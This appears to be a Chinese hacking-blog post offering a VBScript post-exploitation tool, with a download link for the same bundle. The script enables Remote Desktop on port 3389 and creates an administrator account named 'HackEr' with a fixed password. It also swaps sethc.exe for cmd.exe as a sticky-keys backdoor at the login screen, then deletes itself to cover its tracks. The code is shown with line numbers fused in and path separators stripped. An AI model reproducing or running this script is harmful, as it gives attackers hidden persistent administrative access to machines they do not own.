作者:孤狐浪子 来源:红狼
1on error resume next2const HKEY_LOCAL_MACHINE = &H800000023strComputer = "."4Set StdOut = WScript.StdOut5Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\" &_6strComputer & "7ootdefault:StdRegProv")8strKeyPath = "SYSTEMCurrentControlSetControlTerminal Server"9oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath10strKeyPath = "SYSTEMCurrentControlSetControlTerminal ServerWds11dpwdTds cp"12oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath13strKeyPath = "SYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp"14strKeyPath = "SYSTEMCurrentControlSetControlTerminal Server"15strValueName = "fDenyTSConnections"18 collapsed lines
16dwValue = 017oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue18strKeyPath = "SYSTEMCurrentControlSetControlTerminal ServerWds19dpwdTds cp"20strValueName = "PortNumber"21dwValue = 338922oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue23strKeyPath = "SYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp"24strValueName = "PortNumber"25dwValue = 338926oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue27on error resume next28dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="HackEr":password="393214425":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath29On Error Resume Next30Dim obj, success31Set obj = CreateObject("WScript.Shell")32success = obj.run("cmd /c takeown /f %SystemRoot%system32sethc.exe&echo y| cacls %SystemRoot%system32sethc.exe /G %USERNAME%:F© %SystemRoot%system32cmd.exe %SystemRoot%system32acmd.exe© %SystemRoot%system32sethc.exe %SystemRoot%system32asethc.exe&del %SystemRoot%system32sethc.exe&ren %SystemRoot%system32acmd.exe sethc.exe", 0, True)33CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)BY:孤狐浪子 QQ:393214425 BLOG
.blog.163.com附件下载地址: [开3389+非net创建管理用户+Shift后门+自删除脚本.rar](/blog/download.asp?id=52 “http://201314.free.fr/attachments/200801/%bf%aa3389_%b7%c7net%b4%b4%bd%a8%b9%dc%c0%ed%d3%c3%bb%a7_shift%ba%f3%c3%c5_%d7%d4%c9%be%b3%fd%bd%c5%b1%be.rar” (1 KB)